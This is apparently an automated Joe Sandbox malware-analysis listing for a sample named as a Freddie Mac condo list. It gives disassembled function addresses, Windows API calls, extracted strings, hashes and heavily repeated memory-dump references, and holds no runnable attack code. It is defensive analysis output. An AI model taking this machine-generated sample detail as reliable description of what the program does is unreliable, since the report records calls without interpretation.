Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
Instruction ID: 9b528eccc0d206dd4e001c403f359889162c2cb04d4ae21286424304afe4548d
Opcode Fuzzy Hash: 1452018cd2d063f893914e341d210c6f1ccf2aaace09e96268290d6c100d62ec
Instruction Fuzzy Hash: 0D414731A0421DAFDB10DBD5C985EAEBBB8FB08700F50486AE915B7690D734AE04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DefaultLanguage$SystemUser
String ID:
API String ID: 384301227-0
Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileLibraryLoadModuleName
String ID:
API String ID: 1159719554-0
Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99

Uniqueness

Uniqueness Score: -1.00%

Function 005ABB4C, Relevance: 3.0, APIs: 2, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005ABB9E
EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Thread$CurrentEnumWindows
String ID:
API String ID: 2396873506-0
Opcode ID: c23ed00adf58bb8bc199d59d2893d5f3905464b9701e1995fcbbc01dd2e6c622
Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
Opcode Fuzzy Hash: c23ed00adf58bb8bc199d59d2893d5f3905464b9701e1995fcbbc01dd2e6c622
Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0060C158, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994

Uniqueness

Uniqueness Score: -1.00%

Function 0060C664, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698

Uniqueness

Uniqueness Score: -1.00%

Function 0042B848, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042B852
LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8

Uniqueness

Uniqueness Score: -1.00%

Function 005B8250, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 005B8281
SetWindowTextW.USER32(?,00000000), ref: 005B8297

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA

Uniqueness

Uniqueness Score: -1.00%

Function 006AC477, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510

Strings

CommonFilesDir, xrefs: 006AC35C, 006AC3D8
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
COMMAND.COM, xrefs: 006AC55C
cmd.exe, xrefs: 006AC53B
ProgramFilesDir, xrefs: 006AC322, 006AC3A9
SystemDrive, xrefs: 006AC2C1
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
\Program Files, xrefs: 006AC349
Common Files, xrefs: 006AC393

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28

Uniqueness

Uniqueness Score: -1.00%

Function 006AC4CA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510

Strings

CommonFilesDir, xrefs: 006AC35C, 006AC3D8
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
COMMAND.COM, xrefs: 006AC55C
cmd.exe, xrefs: 006AC53B
ProgramFilesDir, xrefs: 006AC322, 006AC3A9
SystemDrive, xrefs: 006AC2C1
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
\Program Files, xrefs: 006AC349
Common Files, xrefs: 006AC393

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38

Uniqueness

Uniqueness Score: -1.00%

Function 004786AC, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$DestroyLong
String ID:
API String ID: 2871862000-0
Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED

Uniqueness

Uniqueness Score: -1.00%

Function 00406DF0, Relevance: 2.6, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409B58, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4

Uniqueness

Uniqueness Score: -1.00%

Function 004236FC, Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
